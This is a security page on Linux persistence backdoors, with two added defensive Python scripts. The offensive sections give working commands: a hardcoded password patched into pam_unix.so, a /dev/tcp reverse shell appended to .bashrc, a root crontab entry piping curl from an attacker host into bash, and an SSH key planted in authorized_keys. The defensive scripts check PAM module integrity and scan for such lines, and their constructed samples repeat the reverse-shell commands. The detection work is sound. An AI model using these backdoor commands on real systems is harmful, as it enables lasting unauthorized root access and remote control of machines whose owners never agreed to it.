🚪Backdoors

A backdoor is any method by which authorized or unauthorized users can bypass normal security measures and gain high-level (root) access to a computer system, network, or software application.

They are designed to be discreet: a backdoor gives a select group of people who know it exists easy access to a system or application.

PAM

This backdoor consists of adding your own hardcoded password to pam_unix.so.

The pam_unix.so module is responsible for authentication.

pam_unix.so uses the unix_verify_password function to verify the user's supplied password:

We add one line to the function's code, comparing the supplied password p against our own:

if (strcmp(p, "0xMitsurugi") != 0)
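As an added defensive counterpart (not part of the original page), the check below shows how a modified pam_unix.so can be spotted: a hash mismatch against a trusted baseline (for example the hash recorded by the distribution's package manager, which dpkg -V or rpm -V compare for you) proves the file changed, and a diff of printable strings against a clean copy shows what was added, since a hardcoded password literal appears as a new string. The ELF-like byte blobs and the module names used as input are constructed for the demonstration.

```python
"""Integrity check for a PAM module. Added example: compare the installed
pam_unix.so against a trusted baseline by hash, then diff printable strings
to see what was added. The byte blobs below are constructed stand-ins."""
import hashlib
import hmac
import re
from typing import Dict, Set

MIN_STRING_LEN = 6


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def printable_strings(data: bytes, min_len: int = MIN_STRING_LEN) -> Set[str]:
    """Runs of printable ASCII at least min_len long, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return {m.decode("ascii") for m in re.findall(pattern, data)}


def new_strings(baseline: bytes, candidate: bytes) -> Set[str]:
    """Strings present in candidate but absent from the clean baseline."""
    return printable_strings(candidate) - printable_strings(baseline)


def matches_baseline(data: bytes, baseline_sha256: str) -> bool:
    """True when data hashes to the trusted value (constant-time compare)."""
    return hmac.compare_digest(sha256_hex(data), baseline_sha256.lower())


def audit_module(candidate: bytes, baseline: bytes) -> Dict[str, object]:
    """Hash verdict plus the strings that would explain a mismatch."""
    expected = sha256_hex(baseline)
    return {
        "hash_ok": matches_baseline(candidate, expected),
        "added_strings": sorted(new_strings(baseline, candidate)),
    }


# Constructed stand-ins for a clean build and a build with a hardcoded
# password literal compiled in; real modules are full ELF files.
CLEAN_MODULE = (b"\x7fELF" + b"\x00" * 12
                + b"_unix_verify_password\x00pam_unix.so\x00" + b"\x00" * 8)
BACKDOORED_MODULE = CLEAN_MODULE + b"0xMitsurugi\x00"

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # Usage: audit.py <installed pam_unix.so> <known-good copy>
        with open(sys.argv[1], "rb") as f, open(sys.argv[2], "rb") as g:
            print(audit_module(f.read(), g.read()))
    else:
        print(audit_module(BACKDOORED_MODULE, CLEAN_MODULE))
```

The baseline must come from somewhere the attacker could not touch: the package manager's recorded hash, or a copy of the module taken at install time and stored off-host. A hash taken from the host under review after the fact proves nothing.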

.bashrc

If a user has bash as their login shell, the ".bashrc" file in their home directory is executed when an interactive session is launched.

For any user who logs in often:

echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Start a nc listener to catch the shell.

CronJob

With root access:

cron jobs file -> /etc/crontab

Configure a task that sends you a reverse shell every minute by adding this line to the crontab file:

* *     * * *   root    curl http://$attacker_ip:8080/shell | bash

The shell file contains:

#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1

On the attacker machine :

nc -nvlp $port

SSH

This consists of saving our SSH key in some user's home directory, after which we can log in as that user via ssh.

Generate an ssh key pair:

ssh-keygen

Append our public key to the user's authorized_keys file (the private key stays on our machine):

mkdir -p ~/.ssh && chmod 700 ~/.ssh
cat id_rsa.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
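The three persistence spots above (the .bashrc file, the system crontab, and the user's authorized_keys file) are plain text, so an auditor can scan them for the same markers the page uses. The script below is an added example, not from the original page: it flags lines that redirect a shell over /dev/tcp, pipe curl or wget output into a shell, or run netcat with -e, and lists authorized_keys entries whose key blob is not in an allowlist you maintain. All sample file contents, IP addresses and key blobs are constructed.

```python
"""Audit the text-based persistence spots discussed above: ~/.bashrc,
/etc/crontab and ~/.ssh/authorized_keys. Added example; every sample
below is constructed, not taken from a real host."""
import re
from typing import Dict, List, Tuple

# Heuristic markers (assumed, not exhaustive) for a shell handed to a remote
# peer or a remote script piped straight into an interpreter.
SUSPICIOUS_PATTERNS = [
    re.compile(r"/dev/tcp/"),                        # bash network redirection
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),  # download and run
    re.compile(r"\bn(c|cat)\b.*\s-e\s"),             # netcat with -e
]


def flag_shell_lines(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, line) for each non-comment line matching a pattern.
    Works for a .bashrc as well as a crontab, since both carry shell commands."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(p.search(stripped) for p in SUSPICIOUS_PATTERNS):
            hits.append((number, stripped))
    return hits


KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")


def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """Return (key_type, key_blob, comment) per entry. A leading options field
    (no-pty, from=..., ...) is skipped; quoted options containing spaces are
    not handled by this simple split."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        if not fields[0].startswith(KEY_TYPE_PREFIXES):
            fields = fields[1:]  # drop the options field
        if len(fields) < 2 or not fields[0].startswith(KEY_TYPE_PREFIXES):
            continue
        entries.append((fields[0], fields[1], " ".join(fields[2:])))
    return entries


def unknown_keys(text: str, allowlist: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (comment, key_type) for entries whose blob is not in allowlist,
    a mapping of known key blob -> owner label."""
    return [(comment, ktype)
            for ktype, blob, comment in parse_authorized_keys(text)
            if blob not in allowlist]


# Constructed samples: one planted line in each file, the rest benign.
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
"""
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root curl http://10.0.0.5:8080/shell | bash
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYBLOBONE alice@laptop
no-pty,no-agent-forwarding ssh-rsa AAAAB3NzaC1yc2EFAKEKEYBLOBTWO backup@nas
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYBLOBTHREE nobody@nowhere
"""
KNOWN_KEYS = {  # constructed allowlist: key blob -> owner
    "AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYBLOBONE": "alice",
    "AAAAB3NzaC1yc2EFAKEKEYBLOBTWO": "backup job",
}


def triage() -> Dict[str, list]:
    """Run all checks over the constructed samples and return the findings."""
    return {
        "bashrc": flag_shell_lines(SAMPLE_BASHRC),
        "crontab": flag_shell_lines(SAMPLE_CRONTAB),
        "authorized_keys": unknown_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEYS),
    }


if __name__ == "__main__":
    for source, findings in triage().items():
        for finding in findings:
            print(f"[{source}] {finding}")
```

On a real host, read each user's .bashrc and .ssh/authorized_keys from /etc/passwd home directories plus /etc/crontab, /etc/cron.d and the per-user crontab spool, and keep the allowlist of key blobs under change control so a key nobody approved stands out.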
